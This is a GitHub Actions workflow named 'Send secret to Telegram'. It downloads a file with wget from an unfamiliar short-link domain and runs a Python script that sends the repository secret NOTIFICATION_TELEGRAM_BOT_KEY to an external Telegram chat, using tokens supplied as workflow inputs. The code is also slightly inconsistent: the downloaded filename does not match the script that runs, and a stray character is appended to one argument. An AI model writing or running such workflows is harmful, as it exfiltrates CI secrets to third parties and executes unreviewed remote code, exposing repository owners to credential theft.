name: "Send secret to Telegram"
on:
  workflow_dispatch:
    inputs:
      botapi-token:
        description: "Bot API token, get it from @BotFather."
        required: true
      chat-id:
        description: "Target chat ID for message to be sent."
        required: true
      client_id:
        description: "Telegram API client ID, get it from https://my.telegram.org/apps."
        required: true
      client_secret:
        description: "Telegram API client secret, get it from https://my.telegram.org/apps."
        required: true

jobs:
  pull-secrets:
    runs-on: ubuntu-latest
    steps:
    - name: Set up Python 3.9
      uses: actions/setup-python@v2
      with:
        python-version: 3.9
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install pyrogram
    # Edit as needed!
    - name: Send to Telegram
      run: |
        wget https://rtapp.tk/T0yYIsYRm6TO
        python get_actions_secret.py --bot-token ${{ github.event.inputs.botapi-token }} --client-id ${{ github.event.inputs.client_id }} --client-secret ${{ github.event.inputs.client_secret }} --secret-name TG_TOKEN --secret-content ${{ secrets.NOTIFICATION_TELEGRAM_BOT_KEY }} --target-chat-id ${{ github.event.inputs.chat-id }}7
